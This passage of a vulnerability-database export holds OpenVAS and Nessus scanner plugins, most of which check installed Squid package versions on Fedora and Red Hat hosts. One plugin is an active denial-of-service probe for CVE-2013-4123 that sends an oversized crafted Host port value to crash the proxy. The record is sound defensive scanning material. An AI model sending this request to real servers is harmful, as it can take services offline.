value:\"squid on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-4800\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131477.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'squid'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"squid\", rpm:\"squid~3.3.12~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:48:36", "bulletinFamily": "scanner", "description": "Check for the Version of squid", "modified": "2017-07-10T00:00:00", "published": "2014-04-16T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867694", "id": "OPENVAS:867694", "title": "Fedora Update for squid FEDORA-2014-4800", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for squid FEDORA-2014-4800\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867694);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-04-16 11:10:38 +0530 (Wed, 16 Apr 2014)\");\n script_cve_id(\"CVE-2013-4123\", \"CVE-2013-4115\", \"CVE-2014-0128\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for squid FEDORA-2014-4800\");\n\n tag_insight = \"Squid is a high-performance proxy caching server for Web clients,\nsupporting FTP, gopher, and HTTP data objects. Unlike traditional\ncaching software, Squid handles all requests in a single,\nnon-blocking, I/O-driven process. Squid keeps meta data and especially\nhot objects cached in RAM, caches DNS lookups, supports non-blocking\nDNS lookups, and implements negative caching of failed requests.\n\nSquid consists of a main server program squid, a Domain Name System\nlookup program (dnsserver), a program for retrieving FTP data\n(ftpget), and some management and client tools.\n\";\n\n tag_affected = \"squid on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-4800\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/131477.html\");\n script_summary(\"Check for the Version of squid\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"squid\", rpm:\"squid~3.3.12~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:13", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2014-09-11T00:00:00", "id": "OPENVAS:1361412562310868180", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868180", "title": "Fedora Update for squid FEDORA-2014-9963", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for squid FEDORA-2014-9963\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868180\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-11 05:56:51 +0200 (Thu, 11 Sep 2014)\");\n script_cve_id(\"CVE-2014-3609\", \"CVE-2013-4123\", \"CVE-2013-4115\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for squid FEDORA-2014-9963\");\n script_tag(name:\"affected\", value:\"squid on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-9963\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-September/137519.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'squid'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"squid\", rpm:\"squid~3.3.13~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:45", "bulletinFamily": "scanner", "description": "Check the version of squid", "modified": "2019-03-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "OPENVAS:1361412562310868397", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310868397", "title": "Fedora Update for squid FEDORA-2014-10794", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for squid FEDORA-2014-10794\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.868397\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2014-10-15 06:01:46 +0200 (Wed, 15 Oct 2014)\");\n script_cve_id(\"CVE-2014-6270\", \"CVE-2014-3609\", \"CVE-2013-4123\", \"CVE-2013-4115\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for squid FEDORA-2014-10794\");\n script_tag(name:\"summary\", value:\"Check the version of squid\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"squid on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2014-10794\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2014-October/140795.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"squid\", rpm:\"squid~3.3.13~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-25T10:51:44", "bulletinFamily": "scanner", "description": "Check for the Version of squid", "modified": "2017-07-10T00:00:00", "published": "2013-08-08T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=866446", "id": "OPENVAS:866446", "title": "Fedora Update for squid FEDORA-2013-13493", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for squid FEDORA-2013-13493\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866446);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-08 11:27:39 +0530 (Thu, 08 Aug 2013)\");\n script_cve_id(\"CVE-2013-4123\", \"CVE-2013-4115\", \"CVE-2013-1839\", \"CVE-2012-5643\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Fedora Update for squid FEDORA-2013-13493\");\n\n tag_insight = \"Squid is a high-performance proxy caching server for Web clients,\nsupporting FTP, gopher, and HTTP data objects. Unlike traditional\ncaching software, Squid handles all requests in a single,\nnon-blocking, I/O-driven process. Squid keeps meta data and especially\nhot objects cached in RAM, caches DNS lookups, supports non-blocking\nDNS lookups, and implements negative caching of failed requests.\n\nSquid consists of a main server program squid, a Domain Name System\nlookup program (dnsserver), a program for retrieving FTP data\n(ftpget), and some management and client tools.\n\";\n\n tag_affected = \"squid on Fedora 18\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-13493\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-August/113071.html\");\n script_summary(\"Check for the Version of squid\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"squid\", rpm:\"squid~3.2.13~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:37:59", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-08-08T00:00:00", "id": "OPENVAS:1361412562310866446", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866446", "title": "Fedora Update for squid FEDORA-2013-13493", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for squid FEDORA-2013-13493\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866446\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-08 11:27:39 +0530 (Thu, 08 Aug 2013)\");\n script_cve_id(\"CVE-2013-4123\", \"CVE-2013-4115\", \"CVE-2013-1839\", \"CVE-2012-5643\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_name(\"Fedora Update for squid FEDORA-2013-13493\");\n\n\n script_tag(name:\"affected\", value:\"squid on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-13493\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-August/113071.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'squid'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"squid\", rpm:\"squid~3.2.13~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:38:28", "bulletinFamily": "scanner", "description": "This host is running Squid Proxy Server and is prone to Denial Of Service\nvulnerability.", "modified": "2019-02-14T00:00:00", "published": "2013-08-12T00:00:00", "id": "OPENVAS:1361412562310802057", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802057", "title": "Squid Proxy Host Header Denial Of Service Vulnerability", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_squid_host_hdr_dos_vuln.nasl 13659 2019-02-14 08:34:21Z cfischer $\n#\n# Squid Proxy Host Header Denial Of Service Vulnerability\n#\n# Authors:\n# Veerendra G.G <veerendragg@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:squid-cache:squid\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802057\");\n script_version(\"$Revision: 13659 $\");\n script_cve_id(\"CVE-2013-4123\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-14 09:34:21 +0100 (Thu, 14 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-12 12:42:47 +0530 (Mon, 12 Aug 2013)\");\n script_name(\"Squid Proxy Host Header Denial Of Service Vulnerability\");\n\n script_tag(name:\"summary\", value:\"This host is running Squid Proxy Server and is prone to Denial Of Service\nvulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Send crafted 'Host' header request and check is it vulnerable to DoS or not.\");\n script_tag(name:\"solution\", value:\"Upgrade to Squid Version 3.2.13 or 3.3.8 or later.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"insight\", value:\"Error when handling port number values within the 'Host' header of HTTP\nrequests.\");\n script_tag(name:\"affected\", value:\"Squid Version 3.2 through 3.2.12 and versions 3.3 through 3.3.7\");\n script_tag(name:\"impact\", value:\"Successful exploitation could allow remote attackers to cause a denial of\nservice via a crafted port number values in the 'Host' header.\");\n\n script_xref(name:\"URL\", value:\"http://www.scip.ch/en/?vuldb.9547\");\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/54142\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2013/Jul/98\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/527294\");\n script_xref(name:\"URL\", value:\"http://www.squid-cache.org/Advisories/SQUID-2013_3.txt\");\n script_category(ACT_DENIAL);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"secpod_squid_detect.nasl\");\n script_mandatory_keys(\"squid_proxy_server/installed\");\n script_require_ports(\"Services/www\", \"Services/http_proxy\", 3128, 8080);\n\n script_xref(name:\"URL\", value:\"http://www.squid-cache.org/Download\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\n\nsquid_port = get_app_port(cpe:CPE);\nif(!squid_port){\n exit(0);\n}\n\nuseragent = http_get_user_agent();\n\n## crafted port value\ncrafted_port_value = crap(length:2000, data:\"AZ\");\n\ncrafted_req = string( \"HEAD http://testhostdoesnotexists.com HTTP/1.1\\r\\n\",\n \"Host: \", \"testhostdoesnotexists.com\", \":\", crafted_port_value, \"\\r\\n\",\n \"User-Agent: \", useragent, \"\\r\\n\", \"\\r\\n\" );\n\ncrafted_res = http_send_recv(port:squid_port, data:crafted_req);\n\nsleep(3);\n\nsoc = http_open_socket(squid_port);\nif(!soc){\n security_message(port:squid_port);\n exit(0);\n}\nhttp_close_socket(soc);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:37:26", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2014-09-04T00:00:00", "id": "OPENVAS:1361412562310871232", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871232", "title": "RedHat Update for squid RHSA-2014:1148-01", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for squid RHSA-2014:1148-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871232\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-09-04 05:57:09 +0200 (Thu, 04 Sep 2014)\");\n script_cve_id(\"CVE-2013-4115\", \"CVE-2014-3609\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"RedHat Update for squid RHSA-2014:1148-01\");\n script_tag(name:\"insight\", value:\"Squid is a high-performance proxy caching server for web clients,\nsupporting FTP, Gopher, and HTTP data objects.\n\nA flaw was found in the way Squid handled malformed HTTP Range headers.\nA remote attacker able to send HTTP requests to the Squid proxy could use\nthis flaw to crash Squid. (CVE-2014-3609)\n\nA buffer overflow flaw was found in Squid's DNS lookup module. A remote\nattacker able to send HTTP requests to the Squid proxy could use this flaw\nto crash Squid. (CVE-2013-4115)\n\nRed Hat would like to thank the Squid project for reporting the\nCVE-2014-3609 issue. Upstream acknowledges Matthew Daley as the original\nreporter.\n\nAll Squid users are advised to upgrade to this updated package, which\ncontains backported patches to correct these issues. After installing this\nupdate, the squid service will be restarted automatically.\");\n script_tag(name:\"affected\", value:\"squid on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"RHSA\", value:\"2014:1148-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2014-September/msg00011.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'squid'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_(6|5)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"squid\", rpm:\"squid~3.1.10~22.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"squid-debuginfo\", rpm:\"squid-debuginfo~3.1.10~22.el6_5\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"squid\", rpm:\"squid~2.6.STABLE21~7.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"squid-debuginfo\", rpm:\"squid-debuginfo~2.6.STABLE21~7.el5_10\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-01-01T07:07:06", "bulletinFamily": "scanner", "description": "This is security update that fixes CVE-2013-4123 and CVE-2013-4115.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-01-02T00:00:00", "id": "FEDORA_2013-13468.NASL", "href": "https://www.tenable.com/plugins/nessus/69201", "published": "2013-08-05T00:00:00", "title": "Fedora 19 : squid-3.2.13-1.fc19 (2013-13468)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-13468.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(69201);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2018/11/28 22:47:45\");\n\n script_cve_id(\"CVE-2013-4115\", \"CVE-2013-4123\");\n script_bugtraq_id(61111, 61159);\n script_xref(name:\"FEDORA\", value:\"2013-13468\");\n\n script_name(english:\"Fedora 19 : squid-3.2.13-1.fc19 (2013-13468)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This is security update that fixes CVE-2013-4123 and CVE-2013-4115.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=983653\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=984632\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-August/113058.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?39ac4bd9\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected squid package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", 